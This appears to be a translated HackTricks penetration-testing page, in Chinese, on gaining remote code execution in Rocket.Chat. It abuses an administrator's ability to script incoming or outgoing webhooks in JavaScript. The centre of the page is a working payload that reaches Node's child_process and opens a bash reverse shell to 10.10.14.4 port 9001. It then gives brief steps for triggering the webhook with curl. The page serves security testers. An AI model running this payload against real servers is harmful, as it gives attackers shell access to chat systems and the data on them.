hacktricks/network-services-pentesting/pentesting-web/rocket-chat.md

Rocket Chat

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• 你在一个网络安全公司工作吗？你想在HackTricks中看到你的公司广告吗？或者你想要获取PEASS的最新版本或下载PDF格式的HackTricks吗？请查看订阅计划！
• 发现我们的独家NFTs收藏品The PEASS Family
• 获取官方PEASS和HackTricks周边产品
• 加入💬 Discord群组 或者 telegram群组 或者 关注我在Twitter上的🐦@carlospolopm.
• 通过向hacktricks repo 和hacktricks-cloud repo 提交PR来分享你的黑客技巧。

RCE

如果你是Rocket Chat中的管理员，你可以获得RCE。

• 进入**Integrations并选择New Integration，然后选择任意一个：Incoming WebHook或Outgoing WebHook**。
• /admin/integrations/incoming

• 根据文档，两者都使用ES2015 / ECMAScript 6（基本上是JavaScript）来处理数据。所以让我们获取一个用于javascript的反向shell，例如：

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")

• 配置WebHook（必须存在通道和以用户名发布）：

• 配置WebHook脚本：

• 保存更改
• 获取生成的WebHook URL：

• 使用curl调用它，您应该收到反向shell

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• 您在网络安全公司工作吗？您想在HackTricks中看到您的公司广告吗？或者您想要访问PEASS的最新版本或下载PDF格式的HackTricks吗？请查看订阅计划！
• 发现我们的独家NFTs收藏品-The PEASS Family
• 获取官方PEASS和HackTricks周边产品
• 加入💬 Discord群组或电报群组或关注我在Twitter上的🐦@carlospolopm。
• 通过向hacktricks repo 和hacktricks-cloud repo 提交PR来分享您的黑客技巧。